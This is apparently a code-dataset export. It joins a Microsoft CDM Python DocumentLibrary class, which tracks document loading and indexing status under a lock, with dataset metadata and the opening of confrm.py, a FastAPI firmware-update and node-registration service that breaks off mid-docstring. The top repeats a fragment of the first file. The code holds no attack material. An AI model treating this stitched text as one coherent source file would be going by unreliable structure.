# doc is no longer loading
self._docs_currently_loading.remove(doc_name)
if doc:
# doc is now loaded
docs_now_loaded.add(doc)
# the doc needs to be indexed
self._docs_not_indexed.add(doc)
doc._currently_indexing = True
return True
else:
# the doc failed to load, so set doc as not found
self._docs_not_found.add(doc_name)
return False
def _mark_document_as_indexed(self, doc: 'CdmDocumentDefinition'):
"""Removes a document from the list of documents that are not indexed to mark it as indexed."""
with self._document_library_lock:
self._docs_not_indexed.discard(doc)
def _mark_document_for_indexing(self, doc: 'CdmDocumentDefinition'):
"""Adds a document to the list of documents that are not indexed to mark it for indexing."""
with self._document_library_lock:
self._docs_not_indexed.add(doc)
def _contains(self, fd: Tuple['CdmFolderDefinition', 'CdmDocumentDefinition']) -> bool:
"""Whether a specific pair of folder-document exists in the list of all documents in the corpus."""
return fd in self._all_documents
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import threading
from typing import Dict, List, Set, Tuple, Union, TYPE_CHECKING
if TYPE_CHECKING:
from cdm.objectmodel import CdmDocumentDefinition, CdmFolderDefinition
class DocumentLibrary:
"""Synchronizes all dictionaries relating to the documents (and their statuses) in the corpus."""
def __init__(self):
# --- internal ---
self._document_library_lock = threading.Lock()
self._docs_not_loaded = set() # type: Set[str]
self._docs_currently_loading = set() # type: Set[str]
self._docs_not_indexed = set() # type: Set[CdmDocumentDefinition]
self._docs_not_found = set() # type: Set[str]
self._all_documents = [] # type: List[Tuple[CdmFolderDefinition, CdmDocumentDefinition]]
self._path_lookup = {} # type: Dict[str, Tuple[CdmFolderDefinition, CdmDocumentDefinition]]
def _add_document_path(self, path: str, folder: 'CdmFolderDefinition', doc: 'CdmDocumentDefinition'):
"""Adds a folder and document to the list of all documents in the corpus. Also adds the document path to the path lookup."""
with self._document_library_lock:
if path not in self._path_lookup:
self._all_documents.append((folder, doc))
self._path_lookup[path] = (folder, doc)
def _remove_document_path(self, path: str, folder: 'CdmFolderDefinition', doc: 'CdmDocumentDefinition'):
"""Removes a folder and document from the list of all documents in the corpus. Also removes the document path from the path lookup."""
with self._document_library_lock:
if path in self._path_lookup:
self._path_lookup.pop(path)
self._all_documents.remove((folder, doc))
def _list_docs_not_indexed(self) -> Set['CdmDocumentDefinition']:
"""Returns a list of all the documents that are not indexed."""
docs_not_indexed = [] # type: List[CdmDocumentDefinition]
with self._document_library_lock:
# gets all the documents that needs indexing and set the currentlyIndexing flag to true.
for doc in self._docs_not_indexed:
doc._currently_indexing = True
docs_not_indexed.append(doc)
return docs_not_indexed
def _list_docs_not_loaded(self) -> Set[str]:
"""Returns a list of all the documents that are not loaded."""
with self._document_library_lock:
return self._docs_not_loaded.copy()
def _list_all_documents(self) -> List['CdmDocumentDefinition']:
"""Returns a list of all the documents in the corpus."""
with self._document_library_lock:
return [fd[1] for fd in self._all_documents]
def _add_to_docs_not_loaded(self, path: str):
"""Adds a document to the list of documents that are not loaded if its path does not exist in the path lookup."""
with self._document_library_lock:
if path not in self._docs_not_found:
lookup = self._path_lookup.get(path.lower()) # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition]
if not lookup:
self._docs_not_loaded.add(path)
def _fetch_document_and_mark_for_indexing(self, path: str) -> 'CdmDocumentDefinition':
"""Fetches a document from the path lookup and adds it to the list of documents that are not indexed."""
with self._document_library_lock:
if path not in self._docs_not_found:
lookup = self._path_lookup.get(path.lower()) # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition]
if lookup:
inner_doc = lookup[1] # type: CdmDocumentDefinition
if not inner_doc._imports_indexed and not inner_doc._currently_indexing:
# mark for indexing.
inner_doc._currently_indexing = True
self._docs_not_indexed.add(inner_doc)
return inner_doc
return None
def _need_to_load_document(self, doc_name: str) -> bool:
"""Sets a document's status to loading if the document needs to be loaded."""
with self._document_library_lock:
if doc_name in self._docs_not_loaded and doc_name not in self._docs_not_found and doc_name not in self._docs_currently_loading:
# set status to loading
self._docs_not_loaded.remove(doc_name)
self._docs_currently_loading.add(doc_name)
return True
return False
def _mark_document_as_loaded_or_failed(self, doc: 'CdmDocumentDefinition', doc_name: str, docs_now_loaded: Set['CdmDocumentDefinition']) -> bool:
"""Marks a document for indexing if it has loaded successfully, or adds it to the list of documents not found if it failed to load."""
with self._document_library_lock:
# doc is no longer loading
self._docs_currently_loading.remove(doc_name)
if doc:
# doc is now loaded
docs_now_loaded.add(doc)
# the doc needs to be indexed
self._docs_not_indexed.add(doc)
doc._currently_indexing = True
return True
else:
# the doc failed to load, so set doc as not found
self._docs_not_found.add(doc_name)
return False
def _mark_document_as_indexed(self, doc: 'CdmDocumentDefinition'):
"""Removes a document from the list of documents that are not indexed to mark it as indexed."""
with self._document_library_lock:
self._docs_not_indexed.discard(doc)
def _mark_document_for_indexing(self, doc: 'CdmDocumentDefinition'):
"""Adds a document to the list of documents that are not indexed to mark it for indexing."""
with self._document_library_lock:
self._docs_not_indexed.add(doc)
def _contains(self, fd: Tuple['CdmFolderDefinition', 'CdmDocumentDefinition']) -> bool:
"""Whether a specific pair of folder-document exists in the list of all documents in the corpus."""
return fd in self._all_documents
|
en
| 0.788465
|
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. Synchronizes all dictionaries relating to the documents (and their statuses) in the corpus. # --- internal --- # type: Set[str] # type: Set[str] # type: Set[CdmDocumentDefinition] # type: Set[str] # type: List[Tuple[CdmFolderDefinition, CdmDocumentDefinition]] # type: Dict[str, Tuple[CdmFolderDefinition, CdmDocumentDefinition]] Adds a folder and document to the list of all documents in the corpus. Also adds the document path to the path lookup. Removes a folder and document from the list of all documents in the corpus. Also removes the document path from the path lookup. Returns a list of all the documents that are not indexed. # type: List[CdmDocumentDefinition] # gets all the documents that needs indexing and set the currentlyIndexing flag to true. Returns a list of all the documents that are not loaded. Returns a list of all the documents in the corpus. Adds a document to the list of documents that are not loaded if its path does not exist in the path lookup. # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition] Fetches a document from the path lookup and adds it to the list of documents that are not indexed. # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition] # type: CdmDocumentDefinition # mark for indexing. Sets a document's status to loading if the document needs to be loaded. # set status to loading Marks a document for indexing if it has loaded successfully, or adds it to the list of documents not found if it failed to load. # doc is no longer loading # doc is now loaded # the doc needs to be indexed # the doc failed to load, so set doc as not found Removes a document from the list of documents that are not indexed to mark it as indexed. Adds a document to the list of documents that are not indexed to mark it for indexing. 
Whether a specific pair of folder-document exists in the list of all documents in the corpus.
| 2.341348
| 2
|
confrm/confrm.py
|
confrm/confrm
| 1
|
6628521
|
<filename>confrm/confrm.py
"""Main FastAPI Implementation of confrm
Copyright 2020 confrm.io
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Codes:
000 ERROR - - Package not found
001 ERROR - - Node not found
002 ERROR - - Package version not found
003 ERROR PUT /package/ Package already exists
004 ERROR PUT /package/ Package name cannot be empty
005 ERROR PUT /register_node/ Node id is invalid
006 ERROR PUT /package_version/ Version already exists for package
007 ERROR DELETE /node_package/ Node does not have a force package entry
008 ERROR PUT /node_package/ Package has no active version
009
010 ERROR PUT /package/ Package name does not match pattern
011 ERROR GET /check_for_update/ No versions found for package
012 ERROR GET /config/ Key not found
013
014
015
016 ERROR PUT /config/ Key name does not match pattern
017 ERROR POST /package_version/ Version numbers cannot be negative
018 ERROR PUT /node_package/ Package version not found
019
020 ERROR DELETE /package_version/ Package version not found
021 WARNING DELETE /package_version/ Active version not set
022 ERROR PUT /node_title/ Node does not exist
023 ERROR PUT /node_title/ Node title is too long
024 ERROR DELETE /config/ Key not found
025
026 ERROR POST /package_version/ Canary node not found
027
028
029
"""
import base64
import datetime
import logging
import os
import re
import time
import uuid
from copy import deepcopy
import toml
from Crypto.Hash import SHA256
from fastapi import FastAPI, File, Depends, Response, Request, status
from fastapi.responses import FileResponse
from fastapi.staticfiles import StaticFiles
from tinydb import TinyDB, Query
from tinydb.operations import delete
from markupsafe import escape
from pydantic import BaseModel # pylint: disable=E0611
from confrm.responses import ConfrmFileResponse
from confrm.zeroconf import ConfrmZeroconf
# Module-level logger for the confrm service; INFO and above are emitted.
logger = logging.getLogger('confrm')
logger.setLevel(logging.INFO)
# pydantic data models are used to describe the inputs for the various REST
# API calls, if the calls do not match these names and data-types then the call
# to FastAPI will fail
class Package(BaseModel):  # pylint: disable=R0903
    """Definition of a package.

    Pydantic model used (via FastAPI ``Depends``) to validate the query
    parameters of the ``PUT /package/`` endpoint.
    """
    name: str         # unique package identifier (validated against ^[0-9a-zA-Z_-]+$ by the endpoint)
    title: str        # human-readable title; falls back to `name` when empty
    description: str  # free-text description
    platform: str     # target platform label (e.g. "esp32")
class PackageVersion(BaseModel):  # pylint: disable=R0903
    """Definition of a package version.

    Pydantic model used (via FastAPI ``Depends``) to validate the query
    parameters of the ``POST /package_version/`` endpoint.
    """
    name: str      # name of the package this version belongs to
    major: int     # semantic-version components; the endpoint rejects negatives
    minor: int
    revision: int
# Application-wide singletons.  CONFIG and DB are populated lazily by
# do_config() (triggered on startup or on first use by some endpoints).
APP = FastAPI()
CONFIG = None   # parsed TOML config dict, or None until do_config() runs
DB = None       # TinyDB handle, or None until do_config() runs
ZEROCONF = ConfrmZeroconf()
def do_config():
    """Load the service configuration and initialise global state.

    Reads the TOML config file named by the ``CONFRM_CONFIG`` environment
    variable into the module-global ``CONFIG``, opens (or creates) the
    TinyDB database inside the configured data directory as ``DB``, and
    ensures the ``blob`` sub-directory used for uploaded firmware exists.

    Raises:
        ValueError: if ``CONFRM_CONFIG`` is unset or does not name a file.
    """
    global CONFIG, DB  # pylint: disable=W0603
    # Membership test directly on os.environ -- no need for .keys().
    if "CONFRM_CONFIG" not in os.environ:
        msg = "CONFRM_CONFIG not set in os.environ"
        logging.error(msg)
        raise ValueError(msg)
    config_file = os.environ["CONFRM_CONFIG"]
    if not os.path.isfile(config_file):
        msg = f"Config file {config_file} does not exist"
        logging.error(msg)
        raise ValueError(msg)
    CONFIG = toml.load(config_file)
    # Create the database from the data store
    DB = TinyDB(os.path.join(CONFIG["storage"]["data_dir"], "confrm_db.json"))
    # Check a blob folder exists (holds base64-encoded uploaded binaries)
    blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
    if not os.path.isdir(blob_dir):
        os.mkdir(blob_dir)
def get_package_versions(name: str, package: {} = None):
    """Handles the version ordering logic.

    Versions are sorted to be in descending order, with the currently
    active version at the top of the list (position 0).

    Attributes:
        name (str): package name string
        package ({}): [Optional] package dict, saves looking up the entry again

    Returns:
        list: dicts of {"number", "date", "blob"} in display order.
    """
    query = Query()
    if package is None:
        # BUG FIX: the original used .search(), which returns a *list*;
        # the later package.keys() call would then raise AttributeError.
        # .get() returns the single matching document (or None -> {}).
        package = DB.table("packages").get(query.name == name) or {}
    package_versions = DB.table("package_versions")
    versions_raw = package_versions.search(query.name == name)
    versions = []
    current_version = None
    for entry in versions_raw:
        date_str = ""
        if entry["date"] <= 0:
            # Sentinel dates (<= 0) indicate the upload time was not recorded.
            date_str = "Unknown"
        else:
            date_str = datetime.datetime.fromtimestamp(entry["date"])
        version_str = f'{entry["major"]}.{entry["minor"]}.{entry["revision"]}'
        if "current_version" in package.keys() and \
                version_str == package["current_version"]:
            # Hold the active version aside so it can be pinned to index 0.
            current_version = {
                "number": version_str,
                "date": date_str,
                "blob": entry["blob_id"]
            }
        else:
            versions.append({
                "number": version_str,
                "date": date_str,
                "blob": entry["blob_id"]
            })
    # Natural-order sort on the dotted version string, newest first.
    versions = sorted(
        versions,
        key=lambda x: [int(i) if i.isdigit()
                       else i for i in x["number"].split('.')],
        reverse=True
    )
    if current_version is not None:
        versions.insert(0, current_version)
    return versions
def format_package_info(package: dict, lite: bool = False):
    """Shape a package DB record for API consumers.

    Two forms are produced: a minimal one for nodes (``lite=True``, only the
    active version) and a full one for the UI (all versions, latest version).

    Attributes:
        package (dict): package dict from DB
        lite (bool): if true a reduced response is generated
    """
    active = package["current_version"] if "current_version" in package.keys() else ""

    # Nodes only need to know which version they should be running.
    if lite:
        return {"current_version": active}

    all_versions = get_package_versions(package["name"], package)
    # "Latest" is the most recently uploaded version, independent of which
    # one is currently active; default to the active one when none exist.
    newest = active
    if all_versions:
        newest = max(all_versions, key=lambda entry: entry["date"])["number"]

    return {
        "name": package["name"],
        "title": package["title"],
        "description": package["description"],
        "platform": package["platform"],
        "current_version": active,
        "latest_version": newest,
        "versions": all_versions,
    }
def get_package_version_by_version_string(package_name: str, version: str):
    """Look up a package-version document by name and dotted version string.

    Returns the TinyDB document, or None when no exact match exists.
    """
    query = Query()
    table = DB.table("package_versions")
    # Split "major.minor.revision" into its three integer components.
    major, minor, revision = (int(part) for part in version.split("."))
    return table.get(
        (query.name == package_name) &
        (query.major == major) &
        (query.minor == minor) &
        (query.revision == revision))
def sort_configs(configs):  # pylint: disable=R0912
    """Order config entries for display.

    Entries are grouped by key (sorted case-insensitively).  Within a key,
    global entries come first (in input order), then package entries sorted
    by package name, then node entries sorted by node id.

    Attributes:
        configs (list): List of config dicts
    """
    ordered = []

    # Unique keys in input order, then alphabetised case-insensitively.
    unique_keys = []
    for entry in configs:
        if entry["key"] not in unique_keys:
            unique_keys.append(entry["key"])

    for key in sorted(unique_keys, key=str.lower):
        package_entries = []
        node_entries = []
        for entry in configs:
            if entry["key"] != key:
                continue
            if entry["type"] == "global":
                ordered.append(entry)
            elif entry["type"] == "package":
                package_entries.append(entry)
            elif entry["type"] == "node":
                node_entries.append(entry)

        # Append package then node entries in id order; for each id the
        # first matching entry in the input wins.
        for pkg_id in sorted([e["id"] for e in package_entries], key=str.lower):
            ordered.append(next(
                e for e in configs
                if e["key"] == key and e["type"] == "package" and e["id"] == pkg_id))
        for nd_id in sorted([e["id"] for e in node_entries], key=str.lower):
            ordered.append(next(
                e for e in configs
                if e["key"] == key and e["type"] == "node" and e["id"] == nd_id))

    return ordered
def set_canary(node_id: str, package: str, version: str):
    """Creates an entry in the canary table for this node.

    If the node already exists then the previous entry will be deleted, and if
    an entry for the package already exists then that will be deleted.
    There can only be one entry per package and per node.

    Attributes:
        node_id (str): Node_id to be added
        package (str): Package name which the node will be set to
        version (str): Version of package the node will be set to
    """
    query = Query()
    canaries = DB.table("canary")
    # Check for existing node entry and delete if it exists
    canary_list = canaries.search(query.node_id == node_id)
    for canary in canary_list:
        # BUG FIX: was canaries.remote(...) -- TinyDB tables have no
        # "remote" method, so stale node entries raised AttributeError.
        canaries.remove(doc_ids=[canary.doc_id])
    # Check for existing entries for the given package, delete if exists
    packages_list = canaries.search(query.package == package)
    for package_doc in packages_list:
        canaries.remove(doc_ids=[package_doc.doc_id])
    # Insert new entry; force starts True so the node updates on its next
    # check-in (register_node clears it once the node reports back).
    canaries.insert({
        "package": package,
        "version": version,
        "node_id": node_id,
        "force": True
    })
def remove_canary(package: str = "", node_id: str = ""):
    """Removes the given package or node canary entry.

    Exceptions:
        ValueError("Canary Not Found")

    Attributes:
        node_id (str): Node_id to be added
        package (str): Package name which the node will be set to
    """
    # At least one selector must be supplied.
    if not package and not node_id:
        raise ValueError("Canary Not Found")

    query = Query()
    canaries = DB.table("canary")
    removed = 0

    if package:
        for doc in canaries.search(query.package == package):
            canaries.remove(doc_ids=[doc.doc_id])
            removed += 1
    if node_id:
        for doc in canaries.search(query.node_id == node_id):
            canaries.remove(doc_ids=[doc.doc_id])
            removed += 1

    # Nothing matched either selector -- signal to the caller.
    if removed == 0:
        raise ValueError("Canary Not Found")
def get_canary(package: str = "", node_id: str = ""):
    """Checks if a canary exists for given package or node_id.

    Package lookup takes precedence when both selectors are supplied.

    Exceptions:
        ValueError("Input Not Set")

    Attributes:
        node_id (str): Node_id to be added
        package (str): Package name which the node will be set to

    Returns:
        None: No entry found
        TinyDB Document: Found entry
    """
    if not package and not node_id:
        raise ValueError("Input Not Set")

    query = Query()
    canaries = DB.table("canary")

    # Package selector first, node selector second; first hit wins.
    if package:
        doc = canaries.get(query.package == package)
        if doc is not None:
            return doc
    if node_id:
        doc = canaries.get(query.node_id == node_id)
        if doc is not None:
            return doc
    return None
def package_exists(package: str):
    """Check whether a package exists in the database.

    Attributes:
        packages (str): Package to search for

    Returns:
        tuple: (package_doc, None, None) on success, or
        (None, HTTP status code, error dict) when the package is missing.
    """
    query = Query()
    package_doc = DB.table("packages").get(query.name == package)
    if package_doc is not None:
        return (package_doc, None, None)
    # Not found -- hand the caller a ready-made 404 payload.
    msg = "Package not found"
    return (None, status.HTTP_404_NOT_FOUND, {
        "error": "confrm-000",
        "message": msg,
        "detail": "The package specified was not found"
    })
def node_exists(node_id: str):
    """Check whether a node exists in the database.

    Attributes:
        packages (str): Package to search for

    Returns:
        tuple: (node_doc, None, None) on success, or
        (None, HTTP status code, error dict) when the node is missing.
    """
    query = Query()
    node_doc = DB.table("nodes").get(query.node_id == node_id)
    if node_doc is not None:
        return (node_doc, None, None)
    # Not found -- hand the caller a ready-made 404 payload.
    msg = "Node not found"
    return (None, status.HTTP_404_NOT_FOUND, {
        "error": "confrm-001",
        "message": msg,
        "detail": "The node specified was not found"
    })
# Files served in /static will point to ./dashboard (with respect to the
# running script).  This serves the bundled web-UI assets; the "/" route
# below returns the dashboard's index.html.
APP.mount("/static",
          StaticFiles(directory=os.path.join(os.path.dirname(__file__), "dashboard")
                      ),
          name="home")
@APP.on_event("startup")
async def startup_event():
    """Is called on application startup.

    Loads configuration and opens the database (see do_config); raises
    ValueError if CONFRM_CONFIG is unset or invalid, aborting startup.
    """
    do_config()
@APP.on_event("shutdown")
async def shutdown_event():
    """Is called on application shutdown.

    Deregisters the service from zeroconf/mDNS so clients stop seeing it.
    """
    ZEROCONF.close()
@APP.get("/")
async def index():
    """Returns index page for UI."""
    # Resolve the dashboard entry point relative to this module.
    index_path = os.path.join(os.path.dirname(__file__), "dashboard/index.html")
    return FileResponse(index_path)
@APP.get("/info/")
async def info():
    """Get basic info for UI elements."""
    # Table lengths give the total package and node counts.
    return {
        "packages": len(DB.table("packages")),
        "nodes": len(DB.table("nodes")),
    }
@APP.get("/time/")
async def get_time():
    """Returns time of day from server as unix epoch time."""
    # Lazily initialise config/DB for callers hitting this endpoint first.
    if CONFIG is None:
        do_config()
    now = round(time.time())
    return {"time": now}
@APP.get("/canary/", status_code=status.HTTP_200_OK)
async def get_canary_api(response: Response, node_id: str = ""):
    """Helper to read back the canary status for a node.

    Attributes:
        node_id (str): The node id to check against
        response (Response): Starlette response object for setting return codes
    """
    found = get_canary(node_id=node_id)
    if found is not None:
        return found
    # No canary entry for this node -- report a 404 with an error payload.
    msg = "Canary entry not found"
    logging.info(msg)
    response.status_code = status.HTTP_404_NOT_FOUND
    return {
        "error": "confrm-022",
        "message": msg,
        "detail": msg
    }
@APP.put("/register_node/", status_code=status.HTTP_200_OK)
async def register_node(  # pylint: disable=R0913
        node_id: str,
        package: str,
        version: str,
        description: str,
        platform: str,
        request: Request,
        response: Response):
    """Registers a node to the server.

    Creates the node record on first contact, otherwise refreshes it and
    reconciles any pending force/canary state for the node.

    Attributes:
        node_id (str): The node id, must be unique, MAC addresses work well
        package (str): Package installed on the node
        version (str): Version string of currently running package
        description (str): Description of package
        platform: (str): Platform type (i.e. esp32)
        request (Request): Starlette request object for getting client information
        response (Response): Starlette response object for setting return codes

    Returns:
        HTTP_200_OK
        HTTP_404_NOT_FOUND
    """
    query = Query()
    nodes = DB.table("nodes")
    # Make sure input is sane -- HTML-escape everything before storage.
    node_id = escape(node_id)
    package = escape(package)
    version = escape(version)
    description = escape(description)
    platform = escape(platform)
    # Asterisk is not allowed!  "*" is reserved as the canary-next wildcard
    # node id (see check_for_update), so a real node may not claim it.
    if node_id == "*":
        msg = "Node id is invalid"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-005",
            "message": msg,
            "detail": "A node attempted to register with an invalid node_id"
        }
    node_doc = nodes.get(query.node_id == node_id)
    if node_doc is None:
        # First contact: create a fresh record; last_updated of -1 means
        # "no update observed yet".  The node_id doubles as initial title.
        entry = {
            "node_id": node_id,
            "title": node_id,
            "package": package,
            "version": version,
            "description": description,
            "platform": platform,
            "last_updated": -1,
            "last_seen": round(time.time()),
            "ip_address": request.client.host
        }
        nodes.insert(entry)
        return {}
    # Update the package entry based on package name change, new version of a package
    # and register this as the last update time
    if node_doc["package"] != package:  # Package changed
        node_doc["package"] = package
        node_doc["version"] = version
        node_doc["last_updated"] = -1
    elif node_doc["version"] != version:  # Version of package changed
        node_doc["version"] = version
        node_doc["last_updated"] = round(time.time())
    node_doc["last_seen"] = round(time.time())
    node_doc["package"] = package
    node_doc["description"] = description
    node_doc["platform"] = platform
    node_doc["ip_address"] = request.client.host
    nodes.update(node_doc, query.node_id == node_id)
    # Check if force package change: once the node reports it is running the
    # forced package, the force entry has done its job and is removed.
    if "force" in node_doc.keys() and node_doc["package"] == node_doc["force"]["package"]:
        nodes.update(delete("force"), query.node_id == node_id)
    # Check to see if a canary: the node checking in clears the canary's
    # force flag (it stays recorded, but no longer compels an update).
    canary = get_canary(node_id=node_id)
    if canary is not None:
        canaries = DB.table("canary")
        canary["force"] = False
        canaries.update(canary, query.node_id == node_id)
    return {}
@APP.get("/nodes/", status_code=status.HTTP_200_OK)
async def get_nodes(package: str = "", node_id: str = ""):
    """Returns a list of nodes, filtered by package and/or node id.

    When only node_id is given, a single node doc is returned instead of
    a list.

    Attributes:
        package (str): name of package to return node list for
    """
    query = Query()
    nodes = DB.table("nodes")

    # Select by whichever filters were supplied.
    if package and node_id:
        matched = nodes.search((query.package == package) &
                               (query.node_id == node_id))
    elif package:
        matched = nodes.search(query.package == package)
    elif node_id:
        matched = nodes.search(query.node_id == node_id)
    else:
        matched = nodes.all()

    if not matched:
        return {}

    # Work on a deep copy so display formatting never mutates DB documents.
    matched = deepcopy(matched)
    for node in matched:
        for field in ("last_updated", "last_seen"):
            if node[field] != -1:
                stamp = datetime.datetime.fromtimestamp(node[field])
                node[field] = f"{stamp:%Y-%m-%d %H:%M:%S}"
            else:
                node[field] = "Unknown"

    # A bare node_id lookup returns the single matching document.
    if node_id and not package:
        return matched[0]
    return matched
@APP.put("/node_title/", status_code=status.HTTP_200_OK)
async def put_node_title(response: Response, node_id: str = "", title: str = ""):
    """Sets the title of a node.

    Attributes:
        package (str): name of package to return node list for
    """
    query = Query()
    nodes = DB.table("nodes")

    # The node must already be registered.
    if nodes.get(query.node_id == node_id) is None:
        msg = "Node does not exist"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-022",
            "message": msg,
            "detail": "While attempting to set the title of a node, the node id given was not"
                      " found"
        }

    # Sanitise, then enforce the 80-character display limit.
    title = escape(title)
    if len(title) > 80:
        msg = "Node title is too long"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-023",
            "message": msg,
            "detail": "While attempting to set the title of a node, the title was too long"
        }

    nodes.update({"title": title}, query.node_id == node_id)
    return {}
@APP.get("/packages/")
async def package_list():
    """Get package list and process for displaying on the UI."""
    # Lazily initialise config/DB if the startup hook has not run yet.
    if CONFIG is None:
        do_config()
    # Map each unique package name to its fully formatted record
    # (title, versions, active/latest version) for the dashboard.
    return {
        package["name"]: format_package_info(package)
        for package in DB.table("packages")
    }
@APP.put("/package/", status_code=status.HTTP_201_CREATED)
async def put_package(response: Response, package: Package = Depends()):
    """Add package description.

    Attributes:
        package (Package): Package description to be added
    """
    # Work directly on the model's attribute dict so in-place escaping is
    # reflected both in the model and in the record we store.
    package_dict = package.__dict__

    # HTML-escape every string field before any validation or storage.
    for field, value in list(package_dict.items()):
        if isinstance(value, str):
            package_dict[field] = escape(value)

    if not package.name:
        msg = "Package name cannot be empty"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-004",
            "message": msg,
            "detail": "While attempting to add a new package the package name was set to \"\""
        }

    # Names are restricted to URL/filesystem-safe characters.
    pattern = '^[0-9a-zA-Z_-]+$'
    regex = re.compile(pattern)
    if regex.match(package_dict["name"]) is None:
        msg = f"Package name does not match pattern {pattern}"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-010",
            "message": msg,
            "detail": "While attempting to add a new package the package name did not match the"
                      f" pattern {pattern}"
        }

    # An empty title defaults to the package name.
    if not package.title:
        package.title = package.name

    packages = DB.table("packages")
    query = Query()
    if packages.get(query.name == package_dict["name"]) is not None:
        msg = "Package already exists"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-003",
            "message": msg,
            "detail": "While attempting to add a new package to the database a package with this " +
                      "name was found to already exist"
        }

    packages.insert(package_dict)
    return {}
@APP.delete("/package/", status_code=status.HTTP_200_OK)
async def delete_package(name: str, response: Response):
    """Delete a package, its versions and all configs.

    Cascades: every stored version (and its blob file) and every
    package-scoped config entry is removed before the package record itself.

    Attributes:
        name (str): Package to be deleted
        response (Response): Starlette response object
    """
    query = Query()
    packages = DB.table("packages")
    package_versions = DB.table("package_versions")
    configs = DB.table("config")
    (package_doc, status_code, err) = package_exists(name)
    if package_doc is None:
        response.status_code = status_code
        return err
    # Get all the package versions associated with this package and delete
    # each through the version endpoint so blob cleanup also happens.
    _versions = package_versions.search(query.name == name)
    for version in _versions:
        version_str = str(version["major"]) + "." + \
            str(version["minor"]) + "." + \
            str(version["revision"])
        await delete_package_version(name, version_str, response)
    # Get all the configs associated with this package
    _configs = configs.search((query.type == "package") &
                              (query.id == name))
    for config in _configs:
        await delete_config(key=config["key"], type="package", response=response, id=name)
    # Finally remove the package record itself.
    packages.remove(doc_ids=[package_doc.doc_id])
    return {}
@APP.post("/package_version/", status_code=status.HTTP_201_CREATED)
async def add_package_version(
        response: Response,
        package_version: PackageVersion = Depends(),
        set_active: bool = False,
        canary_next: bool = False,
        canary_id: str = "",
        file: bytes = File(...)):
    """Uploads a package version with binary package.

    The binary is hashed (SHA-256), stored base64-encoded under a random
    blob id, and the version record is inserted.  Optionally the version
    is made active and/or a canary entry is created.

    Arguments:
        response (Response): Starlette response object for setting return codes
        package_version (PackageVersion): Package description
        set_active (bool): Default False, if true this version will be set active
        canary_next (bool): if true, the next node to check in becomes the canary
        canary_id (str): specific node to use as canary for this version
        file (bytes): File uploaded
    """
    package_version_dict = package_version.__dict__
    packages = DB.table("packages")
    package_versions = DB.table("package_versions")
    query = Query()
    (package_doc, status_code, err) = package_exists(
        package_version_dict["name"])
    if package_doc is None:
        response.status_code = status_code
        return err
    # A named canary node must exist before we accept the upload.
    if canary_id:
        nodes = DB.table("nodes")
        node_doc = nodes.get(query.node_id == canary_id)
        if not node_doc:
            msg = "Node not found"
            logging.info(msg)
            response.status_code = status.HTTP_404_NOT_FOUND
            return {
                "error": "confrm-026",
                "message": msg,
                "detail": "While attempting to add a new package version the node " +
                          " given was not found"
            }
    # Reject duplicate (name, major, minor, revision) tuples.
    existing_version = package_versions.get((query.name == package_version_dict["name"]) &
                                            (query.major == package_version_dict["major"]) &
                                            (query.minor == package_version_dict["minor"]) &
                                            (query.revision == package_version_dict["revision"]))
    if existing_version is not None:
        msg = "Version already exists for package"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-006",
            "message": msg,
            "detail": "While attempting to add a new package version the version given " +
                      " was found to be already used"
        }
    if package_version_dict["major"] < 0 or \
            package_version_dict["minor"] < 0 or \
            package_version_dict["revision"] < 0:
        msg = "Version number elements cannot be negative"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-017",
            "message": msg,
            "detail": "While attempting to add a new package version the version given " +
                      " was found to contain negative numbers"
        }
    # Package was uploaded, create hash of binary so downloads can be
    # integrity-checked later (see get_blob).
    _h = SHA256.new()
    _h.update(file)
    # Store the binary in the data_store as a base64 encoded file under a
    # random (uuid4) blob id.
    filename = uuid.uuid4().hex
    blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
    save_file = os.path.join(blob_dir, filename)
    with open(save_file, "wb") as ptr:
        ptr.write(base64.b64encode(file))
    # Escape the strings
    for key in package_version_dict.keys():
        if isinstance(package_version_dict[key], str):
            package_version_dict[key] = escape(package_version_dict[key])
    # Update with blob details
    package_version_dict["date"] = round(time.time())
    package_version_dict["hash"] = _h.hexdigest()
    package_version_dict["blob_id"] = filename
    # Store in the database
    package_versions.insert(package_version_dict)
    version_str = str(package_version_dict["major"]) + "." + \
        str(package_version_dict["minor"]) + "." + \
        str(package_version_dict["revision"])
    if set_active is True:
        package_doc["current_version"] = version_str
        packages.update(package_doc, query.name == package_doc["name"])
    # If this is being set to active, or a canary, delete existing canaries
    # for the package; "Canary Not Found" just means there were none.
    if set_active is True or canary_id or canary_next is True:
        try:
            remove_canary(package=package_doc["name"])
        except ValueError as err:
            if str(err) != "Canary Not Found":
                raise
    if canary_id:
        set_canary(node_id=canary_id,
                   package=package_doc["name"],
                   version=version_str)
    # "*" is the wildcard canary: the next node to check for updates for
    # this package adopts the canary version (see check_for_update).
    if canary_next:
        set_canary(node_id="*",
                   package=package_doc["name"],
                   version=version_str)
    return {}
@APP.delete("/package_version/", status_code=status.HTTP_200_OK)
async def delete_package_version(package: str, version: str, response: Response):
    """Delete a package version.

    Removes the version record, its blob file, and any canary entries for
    the package.  Deleting the currently active version returns a warning.

